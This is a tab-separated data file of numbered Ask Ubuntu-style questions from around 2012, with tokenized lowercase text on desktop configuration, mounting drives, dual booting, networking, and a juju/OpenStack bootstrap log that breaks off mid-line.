199092	how do i use scale for application-only windows ?	if i have 3 windows opened in the same application ( e.g google chrome ) i get this in the unity bar : ok , that 's good and expected . if i click that , it will scale the windows that belong to that application , like this : great ! that 's what i want to achieve more often by using hot corners . i did that with topleft and scale all windows , like this : how can i achieve the scale of only the application windows ( like chrome ) with a hot corner ( like topright ) ? i 've already tried `` initiate window picker for window group '' but it does n't work . am i missing something ? using ubuntu 12.04 and the scale / scale addons plugins .
199095	how can i play .camrec files made in camtasia ?	i have some educational videos which made by camtasia program do this program save its videos in *.camrec extension so the problem is that there is no version for linux so how can i play these videos with that extension in ubuntu 12.04
199109	apache + nginx ( for only one subdomain )	i have a nice little server with ubuntu 12.04 lts with apache controlled by plesk . now i 've installed nginx for my gitlab subdomain . but now nginx wants to control all . how can i configure the nginx server to provide only one subdomain : git.example.com
199110	how can i instruct nautilus to pre-generate thumbnails ?	i have a large library of pdf documents ( papers , lectures , handouts ) that i want to be able to quickly navigate through . for that i need thumbnails . at the same time however , i see that the ~/.thumbnails folder is piling up with thumbs i do n't really need . deleting thumbnail junk without removing the important thumbs is impossible . if i were to delete them , i 'd have to go to each and every folder with important pdf documents and let the thumbnail cache regenerate . i would love to be able to automate this process . is there any way i can tell nautilus to pre-cache the thumbs for a set of given directories ? note : i did find a set of bash scripts that appear to do this for pictures and videos , but not for any other documents . maybe someone more experienced with scripting might be able to adjust these for pdf documents or at least point me in the right direction on what i 'd have to modify for this to work with pdf documents as well . edit : the response to this question has been quite overwhelming . let me first thank everyone who participated in solving this . the question , its answers and all the discussion around it are a great example of how the collaborative effort of many parties can lead to an optimal solution . this is exactly what makes linux and open source so great . all of the provided answers would deserve the bounty i originally put up for this question . still , there 's only one bounty to award . i owe it to all future readers to choose the answer that solves the problem in the most efficient way . to determine which solution that is , i did a final test run , comparing the three scripts in compatibility , speed and output quality . here are the results : thumbnailer 1 , by rosch : compatibility : ✔ spaces in file name ; ✔ spaces in directory name ; ✘ freedesktop compliant speed : 95 pdfs in 12,6 sec quality : stock nautilus quality additional perks : 1 . ) automatically skips files with preexisting thumbs ; 2 . ) no additional packages needed thumbnailer 2 , by martin orda : compatibility : ✔ spaces in file name ; ✔ spaces in directory name ; ✘ freedesktop compliant speed : 95 pdfs in 70,0 sec quality : significantly better scaling than the stock images . additional perks : 1 . ) automatically skips files with preexisting thumbs 2 . ) compatible with a wide range of image formats besides pdf 3 . ) platform-independent , does not rely on gnome-components thumbnailer 3 , by james henstridge : compatibility : ✔ spaces in file name ; ✔ spaces in directory name ; ✔ freedesktop compliant speed : 95 pdfs in 10,8 sec quality : stock nautilus quality additional perks : 1 . ) automatically skips files with preexisting thumbs 2 . ) compatible with all file formats that are identified by the preinstalled thumbnailers all three scripts are excellent . each has its distinct set of advantages and disadvantages . rosch 's solution works out of the box and might be the right choice for users with a minimal installation . martin orda created a very versatile script that works with a variety of file formats and is de-independent . it excels at thumbnail quality but does so at the expense of speed . in the end it was james solution that fit my use case best . it 's fast , versatile and offers the options to skip over files with preexisting thumbnails . overall winner : james henstridge additional information : all three scripts are fully compatible with nautilus-scripts . you can easily install them following this tutorial . edit 2 : updated review with improved script by rosch .
199113	4od ( uk ) - ca n't stream	i 'm using the most up-to-date version of firefox and flash player . when i go on 4od and press play i used to get the loading screen showing forever with nothing playing . i then had a search and someone suggested to turn off ad-block . so i did and it plays the advertisements . once the last ad has played it does nothing . has anyone else got this problem ? has anyone managed to fix it ? any help would be appreciated . thanks .
199115	application-specific audio settings	is it possible to select the output device and settings of each application , on an independent basis ? if so , how ?
199118	maximizing speed on hybrid drive	i have a hybrid drive ( st750lx003 to be exact ) , is 750 gb including an 8 gb ssd . i currently have ubuntu 12.04 installed , and i recently had a dual-boot installed with windows 8 . the problem is , win8 booted up much faster than ubuntu ( 10-15 seconds vs. 25-30 seconds ) . i had a suspicion that windows was stealing the ssd space , so i uninstalled it , and combined the partition with my ubuntu partition . so far , ubuntu is n't booting any faster . also , i know windows 8 has the hibernation/shutdown feature , but that was n't working anyways . ( i.e . when i selected the power button , it did n't shut down . i had to restart . ) is it possible to tell what files are stored on the ssd part of the drive ? edit : i do have several partitions on my drive . is it possible that the ssd space only maps to space in a particular partition ?
199119	can i upgrade to ubuntu 12.04 ?	graphics processor : geforce 6150se nforce 430 memory:512 mb memory interface:32-bit can i upgrade ?
199124	after tarball restore my pc ( tar xvfpz backup.tgz -c / ) , my sound card and network are not working . how to detect ?	1 . i have a old laptop i installed ubuntu 12.04 on . ( it was acer ) 2 . i booted into single user mode and backed it up via cd / sudo -i tar cvpzf backup.tgz -- exclude=/proc -- exclude=/dev -- exclude=/lost+found -- exclude=/backup.tgz -- exclude=/mnt -- exclude=/sys / 3 . i installed a fresh copy of ubuntu 1204 on my new laptop ( it is dell ) 4 . i boot into single user mode 5 . i backup the existing /boot directory 6 . i untar my backup to restore on to the dell sudo tar xvfpz backup.tgz -c / 7 . i restore the previous /boot directory again 8 . i boot it up , and my profile and settings are loaded ok but , ubuntu shows that there is no sound card.. i can not use unity to drag and change volume . i noticed that the network card also doesnt work . ** how do you make ubuntu recognize changed hardware , if the hardware is already configured for a different laptop ? does anyone know ? **
199127	ubuntu 12.10 : ca n't change window title bar font	in ubuntu 12.10 beta 2 , i 've tried using ubuntu tweak to change the window title bar font , but after it 's changed in the application , it 's not reflected throughout the system . i 've tried different fonts at different sizes with no luck ; the window title font and size stay the same . i know this is a beta release , but all the other fonts change on the system when i change them in ubuntu tweak . the other fonts ( default , desktop , monospace , etc . ) update when they 're changed . just not the window title bar font .
199129	dual booted ubuntu 12.04 with windows 7 . question about boot order and where exactly ubuntu has been installed	this is a bit of a 2 parter : i recently installed ubuntu 12.04 on my windows 7 pc . i had initially created some free space through diskmgmt.msc for ubuntu to be installed to . i never formatted it , but it was left as ~30gb free space . when it installed i never actually got to pick where to install it to , it just installed . now diskmgmt.msc shows that the ~30gb free space is now 2 primary partitions , 21gb and ~8gb . i would provide a screen shot , but new users can not do this . the primary partitions however , seem to be totally empty . my question is , did ubuntu install itself here ? if so , why is the free space marker still at 100 % of the drive ? part 2 : it now seems that ubuntu is the primary os , as i am presented with the `` grub '' screen when my pc boots , and when i leave it , it defaults onto ubuntu , as opposed to the `` aesthetically pleasing '' black on white `` what do you want to boot '' screen . i only use ubuntu to play around with occasionally , or to write c++ in for university work . is there a way of restoring windows back to the primary boot , or is the easiest thing to do to uninstall ubuntu , and re-install it again . how will this affect my windows installation ? if i am to do this , how should i ensure that it installs to my 30gb set aside for this purpose , and that it is not my primary os ? sorry if this has been answered over and over again , i could n't find an exact answer to my situation .
199130	ubuntu 12.04 wireless does not detect networks	i installed ubuntu on a partition of my macbook pro . wireless connections work fine when i switch to osx , but the wireless networks are not even detected when i boot ubuntu . i installed wicd as a new network manager , but i 'm still having the same problem . ubuntu works on a wired connection though . i have searched the web for a solution ... similar questions have been asked but i have not been able to find a way to fix this problem . any help would be greatly appreciated .
199131	retrieving route flags programmatically ?	is there a way to obtain flags of the routing table through any api ? netlink socket does n't show any place for flags . after checking route command 's source code in net-tools it seems that it reads route from proc filesystem , i am wary of doing this , as it seems to be os flavor dependent .
199133	how can i burn bigger audio tracks	i 'm trying to burn 20hr until 30 hr mp3 tracks . is there any software which can do that ? note : that i have bought cd 's which are 30/70 hrs long and i 'm trying to burn some mp3 tracks on audio cd 's .
199134	i want to install ubuntu 12.04 alongside windows 7 , not inside it	i installed edubuntu 12.04 alongside windows 7 ultimate on my asus laptop and it worked ok then i tried to do it for two of my friends , both hp and windows 7 ultimate , but instead of showing `` install ubuntu alongside windows 7 '' it says install it inside the windows os i want it outside of windows and to be alongside it , how 's that ? thanks
199142	cifs shares not mounting after modifying /etc/fstab	i 've been able to mount my nas shares by first making directories in the /media folder , then : sudo gedit /etc/fstab to include the following line for each share i want to auto-mount ; //servername/sharename /media/windowsshare cifs guest , uid=1000 , iocharset=utf8 , codepage=unicode , unicode 0 0 now , however , i upgraded to 12.10 , and suddenly i 'm not able to mount the shares after saving /etc/fstab and sudo mount -a , giving me this error : refer to the mount.cifs ( 8 ) manual page ( e.g . man mount.cifs ) mount error ( 22 ) : invalid argument when in nautilus , the shares are visible under the network tab , unmounted , and when i click on a share , i get the following message : mount : only root can mount //192.168.1.71/photos on /media/photos i checked to ensure smbfs was installed , and no problems there . i 'm stumped .
199147	installing mdm to replace gdm ?	i had downloaded the mdm deb file from the following link . http : //packages.linuxmint.com/pool/main/m/mdm/mdm_1.0.4_i386.deb but when i 'm installing through the gdebi package manager , it shows me this error . it does n't state anything . recently i 've switched from lightdm to gdm how can i resolve this error ?
199159	why does the software centre ask me to install untrusted packages ?	i am trying to install darktable on my ubuntu 12.04 64bit desktop computer . when i attempt to install it through the ubuntu software centre i get a warning : '' requires installation of untrusted packages '' the `` details '' are : darktable libflickcurl0 liblensfun-data liblensfun0 there are two options , ok and repair . if i choose repair , it fails to `` download repository information '' . if i try to add the ppa via terminal and install it , i get cryptic messages about not being able to verify the gpgkey . does this mean it is unsafe to install ? i would really like to get this running ( safely ) as i am a professional photographer and i want to share my workflow with the linux community . thanks
199162	sshfs - no such file or directory	i 'm trying to mount a folder over ssh using sshfs . evertime i do so i get the error no such file or directory my terminal : user @ computer : ~ $ sshfs admin @ server.com : /volume1/somedir ~/mnt/somedir admin @ server.com 's password : admin @ server.com : /volume1/somedir : no such file or directory this is ubuntu 12.04 connecting to a synology nas with ds4.1 what am i doing wrong here ?
199166	navigating to a shared drive from within applications	why is it that when i use nautilus i can access my shared nas drive ( via ip and volume name ) but when i try to access it from within applications i ca n't find it ? this behaviour seems to differ from application to application . is there a way to fix this ?
199175	which tools helps to start ubuntu gui when boot ?	i am on the way to create a live cd from scratch . i used virtual box for this purpose . i installed ubuntu base from ubuntumini.iso and installed gnome-shell . and installed remastersys and created a backup.iso . burned in a cd and boot from a pc . it end in cli . not lead to gui . i tried the same iso in virtualbox . but it work properly there . i think i missed some packages which help to start gui . can you help me to identify the packages missed to include in the cd ?
199176	using jack audio and getting audio to play though headphones	i need to use jack audio to prevent clicks but i 'm having problems getting jack to play though my usb wireless g930 headphones . i 'm using puredata and i can get my usb wireless g930 headphones to work with the alsa setting but jack will only play through the speakers . does anyone know how i can get jack to play through my headphones ? thanks ps i 'm using ubuntu 12.04 64bit
199181	issue with setting up multiple ip addresses on ubuntu server installation	i want to setup two ip addresses on my system for access through lan . this is my config on my other system . desktop installation my desktop installation runs with multiple ip 's added through networkmanager both through lan and wifi . server installation on my server install i 've edited /etc/network/interfaces to the following . auto eth0 auto eth0:1 # ip-1 iface eth0 inet static address 172.16.35.35 network 172.16.34.1 netmask 255.255.254.0 broadcast 172.16.35.255 dns-nameservers 172.16.100.221 8.8.8.8 # ip-2 iface eth0:1 inet static address 172.16.34.34 network 172.16.34.1 netmask 255.255.254.0 gateway 172.16.34.1 broadcast 172.16.35.255 after restarting through `` /etc/init.d/networking restart '' i recieve `` failed to bring up eth0:1 '' what am i doing wrong ? thankyou .
199191	perform upgrades on another ubuntu partition ?	so i run xbmcbuntu on my primary partition , and have 12.10 on my secondary partition , which i do most of my work in . is there a way , either thru terminal or otherwise , to do apt-updates and upgrades to the xbmc partition without logging out of 12.10 and into xbmc ?
199193	1.5 tb usb drive failed to mount	seagate 1.5tb freeagent usb hard drive . formatted fat32 . i figure it is 75 % full . used to work fine in xubuntu it shows up in cairo dock but when i click on it i get `` failed to mount drive ' . nautilus does not display the icon nor does thunar . windows vista will no longer recognise drive either . back track 5r3 also no longer fails to mount it . but and here is the big but my pioneer dv-410 reads the files and plays the everything just fine . i believe this all happened after an unclean shutdown / xubuntu 12.10 system freeze . why ca n't xubuntu mount this drive when a crappy 13 year old dvd player can mount it . i am desperate to back up the data before just in case the drive becomes completely unreadable . using xubuntu 12.10 quantal current 3.5.0.17 kernel ( past 3 kernels wont read it either ) and all newest apt-get update / dist-upgrade are applied . i will post any other info you folks request as needed . additional info as requested by githlar . $ sudo fsck.vfat /dev/sdb dosfsck 3.0.13 , 30 jun 2012 , fat32 , lfn read 512 bytes at 0 : input/output error $ lsusb bus 001 device 003 : id 148f:3070 ralink technology , corp. rt2870/rt3070 wireless adapter bus 002 device 002 : id 0bc2:3001 seagate rss llc bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 007 device 001 : id 1d6b:0001 linux foundation 1.1 root hub
199198	is it possible to emulate a ( windows ) raid controller to recover a raid1 mirror ?	so , im gon na make a point to ask this question a couple of ways for the sake of wording , and how it might trigger a memory that someone might have experience . heres what i have : 1 . two hard drives 2tb each . heres what i did : 1 . activated raid0 striped → fakeraid via bios ( legacy controller mbr ) 2 . later on , activated raid1 mirror → other half of the drives . 3 . backed up raid1 ( essential files ) → to that second raid = the raid1 mirror . this is where i broke it : ( semi sorta on purpose ) 1. deleted one drive , knowing ( somehow ) i could ultimately restore via the mirror . 2 . installed ubuntu to that drive . 3 . attempted to use “disk utility” , “gparted” and “partitionmanager” to mount it/save it or even read it . now im sure if i absolutely had to , i could throw the drives into raid , and rebuild the mirror ... but is there a way for me to : 1. mount 2. read 3. emulate a full controller ( by creating a 1gb virtual image , and raiding it with the physical drive ) 4 . emulate the fs ( mount it without ) thanks in advance for any information you might have .
199199	lenovo thinkpad x1 carbon support	i am considering selling my mac to get money towards a lenovo thinkpad x1 because what i really want to do is to be running an ubuntu system all the time . is this machine completely supported in ubuntu , with no tiny little feature missing just because i am `` going linux '' ? optional user story section , skip to the question below if you do n't have time : i have a friend who bought a `` works on ubuntu '' system a year ago and has hated the fact ever since : battery lasts less than if he boots in windows ( which he despises ) and he ascribes that to `` no good os/harware integration and support for advanced chipset power management features '' , odd behaviour on suspend/resume/hibernate ( says : `` when it works 90 % of the time and the other 10 % it makes you lose your work is as good as broken - > 90 % is the same as 0 % he says ) , some occasional graphics card glitches he can perfectly well live with and has almost grown affectionate to , and finally , and that is what would make him undo his choice if he could , bad `` input device drivers '' . he says : trackpoint and trackpad just `` feel different '' , `` so much better '' on windows and that was impossible to know from the website brochure . that story makes me very doubtful ... but i want to abandon this `` walled garden '' of prison that is my mac and go ubuntu all the way , no doubt about that ! my dilemma at this time is just : `` i do n't want to live with those eternal frustrations for sure '' ! here 's a directly answerable phrasing of my question : is the lenovo thinkpad x1 supported on ubuntu ? yes/no , which version ? which hardware features are not supported ? provide a list optionally : sort the list in descending order of frustration from your experience optionally : mention if there are acceptable workarounds to the `` out-of-the-box '' condition described in the earlier points and whether this ameliorates frustration at least to `` tolerable '' levels comment : the ubuntu hardware certification page is so not-for-end-users it 's unreal . whoa . what would make it end-user friendly is : link to `` buy here and you 'll be just fine , this is the right configuration for you , it 'll work as long as you press buy on that page and do n't browse further '' remove mentions of may and might not work . just tell it straight : press buy here and you will get a working system with the exception of a , b , c ( so that i can decide whether the philosophical `` freedom pleasure '' i get from escaping an apple world is enough to off-balance the loss , for instance , of bluetooth capabilities ( something that i of course use on my mac ) but `` could '' lose to use free ( as in freedom ) software the certification page fails to dispel doubts in me as an end-user . i do n't feel `` eased into ubuntu '' , i feel `` partially informed '' .
199201	how to enable youtube which is banned on a system	i have youtube banned in my system . how can i enable it ? i tried to lookup for it in /etc/hosts.deny file but could n't locate it . looking for an ubuntu specific solution , how to disable/enable it ? does modifying hosts.deny helps or not ?
199202	intermittently wo n't boot - black screen with blinking cursor - 12.04	i have a fresh install of ubuntu on my laptop . this may be a duplicate question , by my situation seems to be slightly different from other people who are/were experiencing similar issues so i thought it would be best to open a new question . it is similar to this question , but not exactly the same . i also want to preface this with the knowledge that i am a linux noob . i installed ubuntu on my laptop with the express purpose of learning linux . that being said i am a computer sciences major and have worked in it for years , just entirely in a windows environment . so while i am pretty computer ... savvy in general , i do n't know much in the way of *nix command line commands and such . anyways , i installed ubuntu from the live cd . i did run into some trouble installing it where i would get a black blinking cursor , but was able to get around it by setting the nomodeset parameter ( similar to what is referenced in the first answer to the question i linked above ) . so anyways , got it installed , worked great , grabbed all the updates from the ubuntu software center , grabbed a few updates , practiced using ssh to get into my linux account in my school 's computers , etc etc . but now issue is i intermittently get the same black blinking cursor option on bootup . it makes it to the os selection screen every time , but sometimes it will boot up fine , other it hangs on the black screen with blinking cursor after i choose an os to boot into . ca n't seem to figure out what the determining factor is . if it happens , i just manually reboot 2 or 3 times until it goes away , but it really is frustrating , and a bit worrisome because ( and this could be my imagination ) but it seems to be increasing in frequency . for example , i have gotten one successful boot out of 7 attempts while writing this on my desktop . i got the impression from the linked question above , and from a few other forum posts , that this is usually caused by a graphics card driver incompatibility with ati or nvidia graphics cards , and that that 's where the nomodeset parameter comes in . however , my laptop is using integrated intel graphics . also , in my experience , driver incompatibilities , especially ones that stop your computer from booting , are n't usually intermittent . either they work or they do n't manually rebooting a few times does n't make the problem temporarily go away . also i did try setting the nomodeset parameter by pressing 'e ' on the os selection screen , and it still hung up , though this time it hung up on a purple screen , no text . the next time i tried it with nomodeset i got a bunch of text and it hung up on : [ 0.305025 ] nmi watchdog enabled , takes one hw-pmu counter . [ 0.305129 ] booting node 0 , processors # 1 [ 0.424438 ] nmi watchdog enabled , takes one hw-pmu counter . [ 0.424542 ] # 2 [ 0.532213 ] nmi watchdog enabled , takes one hw-pmu counter . [ 0.532320 ] # 3 i also tried booting into ( recovery mode ) and it made it to : [ 0.305025 ] nmi watchdog enabled , takes one hw-pmu counter . [ 0.305129 ] booting node 0 , processors # 1 [ 0.424438 ] nmi watchdog enabled , takes one hw-pmu counter . [ 0.424542 ] # 2 the only thing that struck me as being out of sorts during the boot was the line : [ 0.312575 ] pebs disabled due to cpu errata in case this helps the laptop is the asus ua46e-bal7 . i do not having any usb devices plugged in . also it is dual-booting with windows 7 , though i had not yet booted into win7 until after this happened , merely to test to see if that was having trouble as well ( so far seems to boot fine every time ) . while it is brand new to me , it was a refurbed so a hardware issue is n't out of question , and the text logging seems to indicate a cpu issue , but that does n't explain why it works fine in windows . again , if this was a windows machine i would be able to troubleshoot it . boot into safemode , check for driver incompatibilities , run any one of the bootable hardware diagnostic disks i have , perform a repair installation of windows , etc . but for linux i do n't know where to begin .
199203	win7 not genuine after installing 12.04	my friend installed ubuntu 12.04 on his laptop . he made it dual-boot . he installed ubuntu alongside windows7 . the problem is after the installation when he checked his windows 7 it says that it 's not genuine . what do you think is the problem ?
199204	ubuntu dual boot os crashed my computer . now my computer wo n't boot . please help	i 've just tried to install ubuntu 12.04 dual boot os with windows 7 and it finished installing in ubuntu . however , it said that the bootloader `` grub.. '' failed to install . the same exact problem here i receive the error 'grub-install /dev/sda failed ' while attempting to install ubuntu as the computer 's only os . . when i tried to restart my computer , it went to the hp screen since my computer is a dv6 hp laptop and then it goes into this black screen with no words or any buttons will work . there is just a blinking underscore that seems like it 'll allow me to type but makes error sounds when i type . is this because i possibly partitioned my memory incorrectly ? any help would be greatly appreciated . i 'm very desperate . any help would be great . thanks . update : i gave up and just reformatted my whole comp . i 'm sure there was a better way to do it by either booting it up by the live usb with the ubuntu os and try to reinstall grub loader .
199209	how to remove information pop-up in lubuntu 12.10 ?	i would like to stop this program from bothering me : i am in a beta version of quantal and am prompted to report problems all the time . what program is this exactly and how to disable it ?
199211	hard drive overheating on ubuntu , not on windows	i have a dual boot laptop , of lubuntu and windows 7 . i really like ubuntu , and i rarely boot on to windows 7 now . however , one issue that i could not resolve , was that my hard drive heats up on every ubuntu variant that i have tried . i already have tried cleaning dust out of my laptop , and proprietary graphic drivers ( nvidia gt540m ) are installed , and bumblebee is running well . i have googled around for a solution , and have experimented with laptop-mode-tools , and powertop . they did little towards solving the overheating issue . my hard drive still hits 60+ degrees celcius when running on ac . the hard drive temperature reaches 60 degrees when connected to ac , and the palmrest , located right over the hard drive , becomes very warm , bordering on hot . is there any way to reduce hard drive heating ? i really like lubuntu , and am not willing to move to another distro .
199213	gap in firefox 's file menu	firefox 's menu has some gap between options . is this a bug in my ubuntu version of firefox or in the browser itself ? is anyone else facing the issue ? how to fix this ?
199214	what 's the difference between ubuntu and backtrack ?	what 's the difference between ubuntu and backtrack ? like i know it 's different kernels . is it just a deb system with all installed in it for convenience ?
199219	i secured my usb using bitlocker on a windows 7 pc but now i cant see it in ubuntu	how can i read/write to my usb-drive , that is locked using bitlocker in ubuntu ? ( 12.04.1 )
199220	kde-like snap to screen	i am looking for the feature that kde , win7 and afaik also unity provide regarding automated resizing of the windows once i drag it against screen borders and let go . this question has been there before , others were told to install compiz , but that didnt quet change anything . i am running xubuntu 12.04 ( xfce ) , a little hint would be appreciated ! : )
199225	how to format/partition new hdd for windows ?	i have one hdd with ubuntu 12.04 , and now i added another one for windows ( because i wan na play day z =p ) . the problem is that the windows installer says it ca n't partition the hdd ( unknown reason ) . so i want to use ubuntu 's disk utility to format/partition the hdd , but i do n't know exactly what to do ( for example , which filesystem does windows 7 need ? ) . can you help me on this ?
199226	open source vs proprietary drivers for video and image editing	which drivers would be better to use if someone is using applications for image and video editing ( like gimp , inkscape , openshot , cinelerra , pitivi , kdenlive , avidemux , kino , lives and others ) in matter of performance and quality : amd radeon open source driver or ati/amd proprietary drivers ?
199237	juju zookeeper & provisioning agent not deployed	i am using juju with the openstack provider , i expected that when i bootstrap that zookeeper and provisioning agent would get deployed on the bootstrap vm in openstack . this dose not seem to be the case . the bootstrap vm gets deployed but it seems that nothing gets deployed to the vm . see logs below , i may be missing something , also how is it possible to log on the bootstrap vm . could i manual deploy , if so what do i need to do . juju bootstrap commend root @ cinder01 : /home/cinder # juju -v bootstrap 2012-10-12 03:21:20,976 debug initializing juju bootstrap runtime 2012-10-12 03:21:20,982 warning verification of xxxxs certificates is disabled for this environment . set 'ssl-hostname-verification ' to ensure secure communication . 2012-10-12 03:21:20,982 debug openstack : using auth-mode 'userpass ' with xxxx : xxxxxx.10:35357/v2.0/ 2012-10-12 03:21:21,064 debug openstack : authenticated til u'2012-10-13t08:21:13z' 2012-10-12 03:21:21,064 debug openstack : get 'xxxx : xxxxxx.15:8774/v1.1/d5f52673953f49e595279e89ddde979d/flavors' 2012-10-12 03:21:21,091 debug openstack : 200 ' { `` flavors '' : [ { `` id '' : `` 3 '' , `` links '' : [ { `` href '' : `` xxxx : xxxxxx.15:8774/v1.1/d5f52673953f49e595279e89ddde979d/flavors/3 '' , `` rel '' : `` self '' } , { `` href '' : `` xxxx : xxxxxx.15:8774/d5f52673953f49e595279e89ddde979d/flavors/3 '' , `` rel '' : `` bookmark '' } ] , `` name '' : `` m1.medium '' } , { `` id '' : `` 4 '' , `` links '' : [ { `` href '' : `` xxxx : xxxxxx.15:8774/v1.1/d5f52673953f49e595279e89ddde979d/flavors/4 '' , `` rel '' : `` self '' } , { `` href '' : `` xxxx : xxxxxx.15:8774/d5f52673953f49e595279e89ddde979d/flavors/4 '' , `` rel '' : `` bookmark '' } ] , `` name '' : `` m1.large '' } , { `` id '' : `` 1 '' , `` links '' : [ { `` href '' : `` xxxx : xxxxxx.15:8774/v1.1/d5f52673953f49e595279e89ddde979d/flavors/1 '' , `` rel '' : `` self '' } , { `` href '' : `` xxxx : xxxxxx.15:8774/d5f52673953f49e595279e89ddde979d/flavors/1 '' , `` rel '' : `` bookmark '' } ] , `` name '' : `` m1.tiny '' } , { `` id '' : `` 5 '' , `` links '' : [ { `` href '' : `` xxxx : xxxxxx.15:8774/v1.1/d5f52673953f49e595279e89ddde979d/flavors/5 '' , `` rel '' : `` self '' } , { `` href '' : `` xxxx : xxxxxx.15:8774/d5f52673953f49e595279e89ddde979d/flavors/5 '' , `` rel '' : `` bookmark '' } ] , `` name '' : `` m1.xlarge '' } , { `` id '' : `` 2 '' , `` links '' : [ { `` href '' : `` xxxx : xxxxxx.15:8774/v1.1/d5f52673953f49e595279e89ddde979d/flavors/2 '' , `` rel '' : `` self '' } , { `` href '' : `` xxxx : xxxxxx.15:8774/d5f52673953f49e595279e89ddde979d/flavors/2 '' , `` rel '' : `` bookmark '' } ] , `` name '' : `` m1.small '' } ] } ' 2012-10-12 03:21:21,091 info bootstrapping environment 'openstack ' ( origin : ppa type : openstack ) ... 2012-10-12 03:21:21,091 debug access object-store @ xxxx : xx10.49.113.11:8080/v1/auth_d5f52673953f49e595279e89ddde979d/juju-hpc-az1-cb/provider-state 2012-10-12 03:21:21,092 debug openstack : get 'xxxx : xx10.49.113.11:8080/v1/auth_d5f52673953f49e595279e89ddde979d/juju-hpc-az1-cb/provider-state' 2012-10-12 03:21:21,165 debug openstack : 200 ' { } \n' 2012-10-12 03:21:21,165 debug verifying writable storage 2012-10-12 03:21:21,165 debug access object-store @ xxxx : xx10.49.113.11:8080/v1/auth_d5f52673953f49e595279e89ddde979d/juju-hpc-az1-cb/bootstrap-verify 2012-10-12 03:21:21,166 debug openstack : put 'xxxx : xx10.49.113.11:8080/v1/auth_d5f52673953f49e595279e89ddde979d/juju-hpc-az1-cb/bootstrap-verify' 2012-10-12 03:21:21,251 debug openstack : 201 '201 created\n\n\n\n ' 2012-10-12 03:21:21,251 debug launching juju bootstrap instance . 2012-10-12 03:21:21,271 debug access object-store @ xxxx : xx10.49.113.11:8080/v1/auth_d5f52673953f49e595279e89ddde979d/juju-hpc-az1-cb/juju_master_id 2012-10-12 03:21:21,273 debug access compute @ xxxx : xxxxxx.15:8774/v1.1/d5f52673953f49e595279e89ddde979d/os-security-groups 2012-10-12 03:21:21,273 debug openstack : get 'xxxx : xxxxxx.15:8774/v1.1/d5f52673953f49e595279e89ddde979d/os-security-groups' 2012-10-12 03:21:21,321 debug openstack : 200 ' { `` security_groups '' : [ { `` rules '' : [ { `` from_port '' : -1 , `` group '' : { } , `` ip_protocol '' : `` icmp '' , `` to_port '' : -1 , `` parent_group_id '' : 1 , `` ip_range '' : { `` cidr '' : `` 0.0.0.0/0 '' } , `` id '' : 7 } , { `` from_port '' : 22 , `` group '' : { } , `` ip_protocol '' : `` tcp '' , `` to_port '' : 22 , `` parent_group_id '' : 1 , `` ip_range '' : { `` cidr '' : `` 0.0.0.0/0 '' } , `` id '' : 38 } ] , `` tenant_id '' : `` d5f52673953f49e595279e89ddde979d '' , `` id '' : 1 , `` name '' : `` default '' , `` description '' : `` default '' } ] } ' 2012-10-12 03:21:21,322 debug creating juju security group juju-openstack 2012-10-12 03:21:21,322 debug openstack : post 'xxxx : xxxxxx.15:8774/v1.1/d5f52673953f49e595279e89ddde979d/os-security-groups' 2012-10-12 03:21:21,401 debug openstack : 200 ' { `` security_group '' : { `` rules '' : [ ] , `` tenant_id '' : `` d5f52673953f49e595279e89ddde979d '' , `` id '' : 48 , `` name '' : `` juju-openstack '' , `` description '' : `` juju group for openstack '' } } ' 2012-10-12 03:21:21,401 debug openstack : post 'xxxx : xxxxxx.15:8774/v1.1/d5f52673953f49e595279e89ddde979d/os-security-group-rules' 2012-10-12 03:21:21,504 debug openstack : 200 ' { `` security_group_rule '' : { `` from_port '' : 22 , `` group '' : { } , `` ip_protocol '' : `` tcp '' , `` to_port '' : 22 , `` parent_group_id '' : 48 , `` ip_range '' : { `` cidr '' : `` 0.0.0.0/0 '' } , `` id '' : 54 } } ' 2012-10-12 03:21:21,504 debug openstack : post 'xxxx : xxxxxx.15:8774/v1.1/d5f52673953f49e595279e89ddde979d/os-security-group-rules' 2012-10-12 03:21:21,647 debug openstack : 200 ' { `` security_group_rule '' : { `` from_port '' : 1 , `` group '' : { `` tenant_id '' : `` d5f52673953f49e595279e89ddde979d '' , `` name '' : `` juju-openstack '' } , `` ip_protocol '' : `` tcp '' , `` to_port '' : 65535 , `` parent_group_id '' : 48 , `` ip_range '' : { } , `` id '' : 55 } } ' 2012-10-12 03:21:21,647 debug openstack : post 'xxxx : xxxxxx.15:8774/v1.1/d5f52673953f49e595279e89ddde979d/os-security-group-rules' 2012-10-12 03:21:21,791 debug openstack : 200 ' { `` security_group_rule '' : { `` from_port '' : 1 , `` group '' : { `` tenant_id '' : `` d5f52673953f49e595279e89ddde979d '' , `` name '' : `` juju-openstack '' } , `` ip_protocol '' : `` udp '' , `` to_port '' : 65535 , `` parent_group_id '' : 48 , `` ip_range '' : { } , `` id '' : 56 } } ' 2012-10-12 03:21:21,792 debug creating machine security group juju-openstack-0 2012-10-12 03:21:21,792 debug openstack : post 'xxxx : xxxxxx.15:8774/v1.1/d5f52673953f49e595279e89ddde979d/os-security-groups' 2012-10-12 03:21:21,871 debug openstack : 200 ' { `` security_group '' : { `` rules '' : [ ] , `` tenant_id '' : `` d5f52673953f49e595279e89ddde979d '' , `` id '' : 49 , `` name '' : `` juju-openstack-0 '' , `` description '' : `` juju group for openstack machine 0 '' } } ' 2012-10-12 03:21:21,871 debug access compute @ xxxx : xxxxxx.15:8774/v1.1/d5f52673953f49e595279e89ddde979d/flavors/detail 2012-10-12 03:21:21,871 debug openstack : get 'xxxx : xxxxxx.15:8774/v1.1/d5f52673953f49e595279e89ddde979d/flavors/detail' 2012-10-12 03:21:21,906 debug openstack : 200 ' { `` flavors '' : [ { `` vcpus '' : 2 , `` disk '' : 10 , `` name '' : `` m1.medium '' , `` links '' : [ { `` href '' : `` xxxx : xxxxxx.15:8774/v1.1/d5f52673953f49e595279e89ddde979d/flavors/3 '' , `` rel '' : `` self '' } , { `` href '' : `` xxxx : xxxxxx.15:8774/d5f52673953f49e595279e89ddde979d/flavors/3 '' , `` rel '' : `` bookmark '' } ] , `` rxtx_factor '' : 1.0 , `` os-flv-ext-data : ephemeral '' : 40 , `` ram '' : 4096 , `` id '' : `` 3 '' , `` swap '' : `` '' } , { `` vcpus '' 